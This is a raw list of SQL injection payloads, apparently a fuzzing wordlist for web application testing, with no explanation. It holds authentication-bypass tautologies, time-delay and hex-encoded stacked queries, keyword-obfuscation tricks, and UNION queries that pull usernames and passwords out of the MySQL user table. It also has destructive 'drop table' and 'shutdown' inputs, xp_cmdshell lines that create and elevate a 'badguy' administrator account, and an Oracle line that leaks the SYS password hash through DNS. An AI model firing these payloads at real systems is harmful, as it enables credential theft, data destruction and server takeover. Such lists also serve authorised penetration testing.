'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
a" or 1=1--
" or "a" = "a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (4000) select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
'or 1='1
` or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 10.124.62.81'--
BITAND(1,1)-BITAND(1,1)
@@PACK_RECEIVED-@@PACK_RECEIVED
CONNECTION_ID()-CONNECTION_ID()
SELECT CAST(@@version AS int)
1+@@version
SELECT @@version
SeLeCt
SELSELECTECT
%53%45%4c%45%43%54
%2553%2545%254c%2545%2543%2554
varchar value '
'adm'||'in'
'adm'+'in'
concat('adm','in')
%2553%2545%254c%2545%2543%2554 password from users where username = chr(97) ||
%chr(100) || chr(109) || chr(105) || chr(110)
SeLeCt password from users where username = chr(97) || %chr(100) || chr(109) || chr(105) || chr(110)
SELSELECTECT password from users where username = chr(97) || %chr(100) || chr(109) || chr(105) || chr(110)
SEL/*foo*/ECT username,password FR/*foo*/OM users
SELECT/*foo*/username,password/*foo*/FROM/*foo*/users
exec('select * from users')
exec('sel' + 'ect * from ' + 'users')
exec('sel' + 'ect * from ' + '*')
;exec('sel' + 'ect * from ' + '*');--
declare l_cnt varchar2(20); begin execute immediate 'sel'||'ect * fr'||'om_users' into l_cnt; dbms_output.put_line(l_cnt); end;
declare @q varchar(8000); select @q = 0x73656c656374202a2066726f6d207573657273; exec (@q)
admin;--
SELECT * FROM users WHERE username = aaaaaaaaaaaaaaaaaaa'
SELECT * FROM users WHERE username = 'admin''--' and password = '' or 1=1--
SELECT * FROM users WHERE username = 'aaaaaaaaaaaaaaaaaaa'' and password = ' or 1=1--'
a'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
INSERT INTO users (username, password, ID, privs) VALUES ('foo''','secret', 2248, 1)
SELECT password FROM users WHERE username = 'foo''
' shutdown--
' drop table users--
' drop table accounts--
' drop table customers--
' or 1 in (select password from users where username='admin')--
admin' AND 1=1--
admin' AND 1=2--
||UTL_INADDR.GET_HOST_NAME((SELECT%20PASSWORD%20FROM%20DBA_USERS%20WHERE%20USERNAME='SYS')||'
admin' AND ACII(SUBSTRING('Admin',1,1)) = 65--
admin' AND ASCII(SUBSTRING('Admin',1,1)) == 66--
0) UNION ALL SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 FROM information_schema.schemata WHERE 1 = (1
0) UNION ALL SELECT 1, schema_name, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 FROM information_schema.schemata WHERE 1 = (1
0) UNION ALL SELECT 1, table_name, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 FROM information_schema.tables WHERE table_schema = 'mysql' AND 1 = (1
0) UNION ALL SELECT 1, column_name, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 FROM information_schema.columns WHERE table_schema = 'mysql' AND table_name = 'user' AND 1 = (1
0) UNION ALL SELECT 1, user_name, password, 4,5,6,7,8,9,10,11,12 from user where 1 = (1
0) UNION ALL SELECT *, 2 from user where 1 = (1
0)%20UNION%20ALL%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012%20FROM%20information_schema.schemata%20WHERE%201%20=%20(1
0)%20UNION%20ALL%20SELECT%201,%20schema_name,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012%20FROM%20information_schema.schemata%20WHERE%201%20=%20(1
0)%20UNION%20ALL%20SELECT%201,%20table_name,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%20'mysql'%20AND%201%20=%20(1
0)%20UNION%20ALL%20SELECT%201,%20column_name,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012%20FROM%20information_schema.columns%20WHERE%20table_schema%20=%20'mysql'%20AND%20table_name%20=%20'user'%20AND%201%20=%20(1
0)%20UNION%20ALL%20SELECT%201,%20user_name,%20password,%204,5,6,7,8,9,10,11,12%20from%20user%20where%201%20=%20(1
0)%20UNION%20ALL%20SELECT%20*,%202%20from%20user%20where%201%20=%20(1
0) UNION ALL SELECT * from user where 1 = (1
0) UNION ALL SELECT *, 2 from user where 1 = (1
;UNION ALL SELECT * from user where 1 = 1;--
UNION ALL SELECT * from user where 1 = 1;--
'+convert(int,convert(varchar,0x7b5d))+'=1
[4=&5=&3=&8=&7=&1=&6=&2=&quantity=1%20AND%20SLEEP(21)=0]
'; exec master..xp_cmdshell 'ping 10.124.62.174'--
SELECT DB_NAME()
SELECT DB_NAME();
%53%45%4c%45%43%54%20%44%42%5f%4e%41%4d%45%28%29
SelEcT Db_NaMe()
SELECT HOST_NAME()
%53%45%4c%45%43%54%20%48%4f%53%54%5f%4e%41%4d%45%28%29
%53%45%4c%45%43%54%20%75%73%65%72%5f%6e%61%6d%65%28%29%3b
(select%201)
select%201
(select%201%2c2)
select%201%2c2
admin'
admin#
admin--
`;insert into userinfo values('x','x'); --
`;create databaser hacker; --
`;exec master..xp_cmdshell "echo you-are-hacked> c:\hacked.txt:ads.txt; --
`;exec master..xp_cmdshell "net localgroup administrators badguy /ADD"; --
`;exec master..xp_cmdshell "net user badguy /ADD"; --
'' or 1=1--
' or 1=1-- 
\'' or 1=1--
\' or 1=1-- 
(0)union(select(0),database(),(0))#
0/**/union/**/select/**/0,database(),0#
1 and 1=0 union select null,group_concat(column_name),null from information_schema.columns where table_name=0x7573657273#
1 and 1=0 union select null,group_concat(column_name),null from information_schema.columns where table_name=concat(char(117),char(115),char(101),char(114),char(115))#
1;declare @s varchar(4000);set @s=cast(0x77616974666f722064656c6179202730303a30303a3330273b as varchar(4000));exec @s;--
' or 1=(case when (select user())='sa' then 1 else 2 end) or 'a'='b
' union ALL select…
' or 777=777--
' or 'a' like 'a'--
